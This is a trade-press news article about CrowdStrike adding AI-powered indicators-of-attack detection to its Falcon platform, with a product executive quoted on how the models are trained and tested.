The new feature leverages millions of examples of malicious activity to more accurately identify signs of an attack. Credit: Matejmo / Getty Images Cybersecurity vendor CrowdStrike has added new AI-powered indicators of attack (IoA) functionality to its Falcon platform. Announced at the Black Hat USA 2022 Conference, the enhancement leverages AI techniques to create new IoAs at machine speed and scale to help organizations stop emerging attack techniques and enable them to optimize detection and response, the firm said.AI IoAs trained on real-world adversary behavior, rich threat intelligenceIn a press release, CrowdStrike stated that Falcon now allows organizations to find emerging attack techniques with IoAs created by AI models trained on real-world adversary behavior and rich threat intelligence. Brian Trombley vice president product management, endpoint security at CrowdStrike, tells CSO that the AI-powered IoAs leverage intelligence from the CrowdStrike Security Cloud, where the firm collects over one trillion security events per day from its customer base.“We correlate this telemetry using machine learning to create new IoAs,” Trombley adds. “Human threat experts then create a corpus of behaviors ranging from hundreds of thousands to millions of examples of clean and malicious activity, before data scientists begin the process of turning telemetry into an AI or ML model that powers the creation of new IoAs. All IoAs, including AI-powered IoAs, are delivered to the Falcon agent in the same fashion working alongside our sensor ML models. The AI-powered IoA technology is highly flexible and can be used to model on any event data captured by the CrowdStrike Falcon platform.” AI-powered IoAs tested against rich field telemetry, crafted kill chainsCrowdStrike’s models are calibrated against an ever-expanding body of expert-generated ground truth that is aggregated across the Falcon platform – spanning intelligence from CrowdStrike’s Managed Threat Hunting (Falcon OverWatch), Malware Research Center (MRC), and Managed Detection and Response (Falcon Complete), Trombley tells CSO. “To test the accuracy of the AI-powered IoAs, CrowdStrike’s threat hunters and researchers evaluate the models against this rich field telemetry and specifically crafted kill chains.” This ensures that the models are resistant to adversarial ML attacks, can detect malicious tactics, techniques and procedures (TTPs), and generate low false positive detections against real world customer data, Trombley says. “Additionally, prior to enabling live detections, in order to minimize customer exposure to false positives, the models are run silently to allow subject matter experts to meticulously evaluate detections and tune for best performance in-field.”CrowdStrike strives to minimize false positives and false negatives as they leave security teams struggling to sift through yet more noise instead of stopping breaches, Trombley says. “We used this same testing capability to test and tune our AI-powered IoAs as well. During our testing, we identified over 20 new adversary patterns, which were confirmed by Falcon OverWatch’s elite threat hunters. Over the same period, our new models collectively identified less than ten false positives and have continued to perform at this level of fidelity since moving into general availability.” Related content news analysis Thousands of servers hacked due to insecurely deployed Ray AI framework Ray deployments are not intended to connect to the internet, but AI developers are doing so anyway and leaving their servers vulnerable. By Lucian Constantin Mar 28, 2024 4 mins Vulnerabilities news Cisco: Security teams are ‘overconfident’ about handling next-gen threats Tooling complexity and generative AI may harm many companies’ security posture. By Jon Gold Mar 28, 2024 3 mins Security brandpost Sponsored by Microsoft Security Iran’s evolving influence operations and cyberattacks support Hamas Understanding how Iranian and Iran-affiliated threats traverse 3 distinct phases may help identify vulnerabilities and attack vectors. By Microsoft Security Mar 28, 2024 5 mins Security news Report suggests cybersecurity investment, board involvement linked to better shareholder returns The study by Diligent and Bitsight points to advanced security and strong risk or audit committees as good predictors of an enterprise’s financial success. By sascha _brodsky Mar 28, 2024 4 mins CSO and CISO Business Business IT Alignment PODCASTS VIDEOS RESOURCES EVENTS SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe